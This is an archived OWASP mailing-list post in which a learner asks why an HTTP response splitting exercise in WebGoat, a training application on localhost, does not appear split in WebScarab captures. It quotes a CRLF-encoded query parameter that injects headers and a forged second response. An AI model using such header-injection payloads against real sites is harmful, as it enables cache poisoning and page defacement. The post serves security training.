[Owasp-cincinnati] WebGoat HTTP Splitting Attack Question
Zhou, Yan
yzhou at medplus.com
Fri Jul 18 09:46:52 EDT 2008
HI there,
Although I successfully completed HTTP Splitting Attack in WebGoat 5.2,
I did not understand a step-by-step behavior of the attack. I am using
WebScarab to capture all request & response to give me a better idea.
For example, what does the browser do with the 2nd "made-up" response?
Here is what I did for testing.
First, I put in the query parameter exactly as is given in the hint:
language=?foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK
%0d%0aContent- .........
This is the response I got from server below:
HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Location:
http://localhost/WebGoat/attack?Screen=2&menu=100&fromRedirect=yes&langu
age=language=?foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%
20OK%0d%0aLast-Modified:%20Wed,%2016%20Jul%202018%2012:55:46%20GMT%0d%0a
Content-Type:%20text/html%0d%0aContent-Length:%2047%0d%0a%0d%0a<html>Ins
ert undesireable content here</html>
Content-Type: text/html;charset=ISO-8859-1
Content-length: 0
Date: Wed, 16 Jul 2008 13:47:47 GMT
Notice that the response does not appear to be split, the 2nd injected
response is still part of the query parameter as shown in "location"
header. Is this a display issue or am I missing something?
The browser then generates the next GET request, everything I injected
is now part of GET parameter (if the response is split, I would not see
the injected content being part of the query parameter, right?)
GET
http://localhost:80/WebGoat/attack?Screen=2&menu=100&fromRedirect=yes&la
nguage=language=?foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%202
00%2
<http://localhost/WebGoat/attack?Screen=2&menu=100&fromRedirect=yes&lang
uage=language=?foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200
%252> ...........
Then, the response from server, the server should respond with the above
GET request, right? But here is what I see, notice that is DIFFERENT
from what I injected because of the additional headers.
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: No-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 19:00:00 EST
Content-Type: text/html
X-Transfer-Encoding: chunked
Date: Fri, 18 Jul 2008 13:28:52 GMT
Content-length: 45
<html>Insert undesireable content here</html>
My questions are:
1. I would hope to see two responses being split in the middle like
this. I do not know if this is just a matter of displaying (since the
attack was successful)
HTTP/1.1 200 OK
...
Set-Cookie: author=Wiley Hacker
HTTP/1.1 200 OK
...
2. why is not there a response to the 2nd GET request, but a similar
response to my injected text?
Thanks,
Yan Zhou
Confidentiality Notice: The information contained in this electronic transmission is confidential and may be legally privileged. It is intended only for the addressee(s) named above. If you are not an intended recipient, be aware that any disclosure, copying, distribution or use of the information contained in this transmission is prohibited and may be unlawful. If you have received this transmission in error, please notify us by telephone (513) 229-5500 or by email (postmaster at MedPlus.com). After replying, please erase it from your computer system.
-------------- next part --------------
An HTML attachment was scrubbed...
URL: https://lists.owasp.org/pipermail/owasp-cincinnati/attachments/20080718/b56809cb/attachment.html
More information about the Owasp-cincinnati
mailing list